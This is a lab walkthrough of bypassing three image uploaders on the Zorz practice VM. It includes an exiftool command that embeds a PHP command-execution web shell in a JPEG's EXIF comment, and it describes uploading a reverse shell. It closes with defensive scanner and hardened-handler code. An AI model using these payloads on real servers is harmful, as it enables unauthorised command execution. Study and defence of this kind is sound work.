Code name: Zorz
VM Download: http://download.vulnhub.com/tophatsec/Zorz.ova
Challenge: Bypass all 3 image uploaders
After making sure that Zorz is running in our VirtualBox, we proceed by running netdiscover as usual.
As our target is running under VirtualBox, its MAC address vendor is Cadmus Computer Systems. Now we can run nmap:
# nmap -Pn -A -p- 192.168.11.8
Port 80 is open as expected, time to put that address in the browser and start the show.
Once we enter the site, a simple image uploader appears. This will be our first “challenge”. Our goal is to upload an evil PHP file. So why not just select an evil PHP file in the browser and upload it directly to the server?
Lelz. File uploaded, so damn easy. But now, where is the file? After uploading the PHP shell, we have to find the “uploads” directory. We can start with nikto.
# nikto -h http://192.168.11.8
Uh, nothing new, except for phpMyAdmin (our goal is to pwn nothing more than the uploaders). We can try dirbuster to search for hidden directories.
Jackpot! uploads1, uploads2 and uploads3. Logically, our baby must be in the first directory.
Here it is, let’s run it.
Everything is working there. Let’s go for the second challenge.
The second uploader looks just like the first, but a few things work a little differently here. Let’s see what happens if we try the same trick we used on the first uploader.
What if we change the file extension?
Nothing. Well, for the next trick we need a simple JPEG image. I can create it with GIMP.
What we do now is edit the “Comment” field in the EXIF data of the image and put some evil PHP code there; exiftool will do the work.
# exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' 3.jpg
Now we can change the extension of that image to .php.jpg
# cp 3.jpg 3.php.jpg
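From the defender’s side, the two tricks above leave fingerprints that are easy to look for after the fact: a script extension buried in the filename (3.php.jpg) and a PHP open tag sitting inside what should be pure image data (the EXIF comment). The following CLI scanner is an added example, not code from the Zorz VM or from this walkthrough; it walks an uploads directory (the path is an assumption passed on the command line) and reports files that show either sign, or whose bytes do not match the image type their extension claims.

```php
<?php
// Added example: scanner for an uploads directory (not part of the Zorz VM).
// Usage (path is an assumption): php scan_uploads.php /var/www/html/uploads2
declare(strict_types=1);

/**
 * Returns [path => [reasons...]] for every suspicious file in $dir.
 */
function scan_uploads(string $dir): array
{
    $findings  = [];
    $finfo     = new finfo(FILEINFO_MIME_TYPE);
    $scriptExt = ['php', 'phtml', 'php3', 'php4', 'php5', 'phar'];
    $imageMime = [
        'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
        'png' => 'image/png',  'gif'  => 'image/gif',
    ];

    foreach (new DirectoryIterator($dir) as $entry) {
        if (!$entry->isFile()) {
            continue;
        }
        $path  = $entry->getPathname();
        $parts = explode('.', strtolower($entry->getFilename()));
        array_shift($parts);            // drop the base name, keep every extension
        $reasons = [];

        // (a) "3.php.jpg": a script extension anywhere in the name, not just at the end.
        if (array_intersect($parts, $scriptExt)) {
            $reasons[] = 'script extension in filename';
        }

        // (b) A PHP open tag in the body, e.g. planted in an EXIF comment.
        $bytes = file_get_contents($path);
        if ($bytes !== false && preg_match('/<\?(php|=)/i', $bytes)) {
            $reasons[] = 'PHP open tag inside file body';
        }

        // (c) Extension says image, bytes say otherwise (a renamed .php file).
        $last = end($parts);
        if ($last !== false && isset($imageMime[$last])
            && $finfo->file($path) !== $imageMime[$last]) {
            $reasons[] = 'content does not match extension';
        }

        if ($reasons) {
            $findings[$path] = $reasons;
        }
    }
    return $findings;
}

foreach (scan_uploads($argv[1] ?? '.') as $path => $reasons) {
    echo $path, ': ', implode('; ', $reasons), PHP_EOL;
}
```

Check (b) is the one that catches the exiftool payload: the file is still a perfectly valid JPEG to finfo and to getimagesize, so type sniffing alone would pass it, and only the presence of `<?php` in the bytes gives it away. Run it against each of the three uploads directories found with dirbuster to see which uploader let what through.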
Meanwhile on the web browser…
Pwned. Challenge 2 completed, only the 3rd uploader remains.
A simple PHP & jQuery uploader. Let’s try a different trick on this one.
What we did here is use Burp Suite to change the content type and the filename on the fly, and introduce our php-reverse-shell onto the system.
The result was great, as expected.
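All three uploaders fail for the same underlying reason: they trust something the client sent (the extension, a substring of the filename, or the Content-Type header) instead of looking at the bytes. The handler below is an added example written for this writeup, not code from the Zorz VM; it assumes a form field named `image`, a storage directory outside the web root (`/var/uploads`, an assumption), and PHP with the fileinfo and GD extensions. It detects the type from the file contents, refuses anything that is not a decodable image, re-encodes the pixels so no EXIF comment survives, and builds the stored filename itself, so none of the three tricks above reaches disk as executable PHP.

```php
<?php
// Added example: hardened image upload handler (not the Zorz VM's code).
// Assumptions: form field "image"; UPLOAD_DIR is outside DocumentRoot and has
// no PHP handler; PHP 7+ with the fileinfo and GD extensions.
declare(strict_types=1);

const UPLOAD_DIR = '/var/uploads';     // assumption: not web-served as PHP
const MAX_BYTES  = 2 * 1024 * 1024;    // 2 MiB

// Server-detected MIME type => [GD decoder, GD encoder, canonical extension].
// The client's Content-Type and filename are never consulted.
const ALLOWED = [
    'image/jpeg' => ['imagecreatefromjpeg', 'imagejpeg', 'jpg'],
    'image/png'  => ['imagecreatefrompng',  'imagepng',  'png'],
    'image/gif'  => ['imagecreatefromgif',  'imagegif',  'gif'],
];

function reject(string $why): void
{
    http_response_code(400);
    exit("Upload rejected: $why\n");
}

if (!isset($_FILES['image']) || $_FILES['image']['error'] !== UPLOAD_ERR_OK) {
    reject('no file or transfer error');
}
$tmp = $_FILES['image']['tmp_name'];
if (!is_uploaded_file($tmp)) {
    reject('not an uploaded file');
}
if (filesize($tmp) > MAX_BYTES) {
    reject('too large');
}

// 1. Sniff the real type from the bytes. A Burp-edited Content-Type header
//    (uploader 3) has no influence here.
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
if (!isset(ALLOWED[$mime])) {
    reject("type $mime not allowed");
}

// 2. Require a parseable image and make getimagesize agree with finfo.
$info = @getimagesize($tmp);
if ($info === false || $info['mime'] !== $mime) {
    reject('not a valid image');
}
[$decode, $encode, $ext] = ALLOWED[$mime];

// 3. Re-encode through GD. The output holds pixel data only, so an EXIF
//    comment carrying PHP (uploader 2) is dropped rather than copied.
$img = @$decode($tmp);
if ($img === false) {
    reject('image could not be decoded');
}

// 4. Random stored name; the extension comes from the detected type, never
//    from the client filename, so "3.php.jpg" can never become a .php path.
$name = bin2hex(random_bytes(16)) . '.' . $ext;
$dest = UPLOAD_DIR . '/' . $name;
if (!$encode($img, $dest)) {
    reject('could not save image');
}
imagedestroy($img);
chmod($dest, 0644);

echo "Stored as $name\n";
```

Two points worth keeping even if the rest is adapted: the stored path must not be under a directory where the web server maps .php (or double extensions such as .php.jpg) to the PHP handler, and the re-encode step is what makes metadata-based payloads harmless, since a validator that only checks magic bytes still passes the exiftool-modified JPEG from challenge 2.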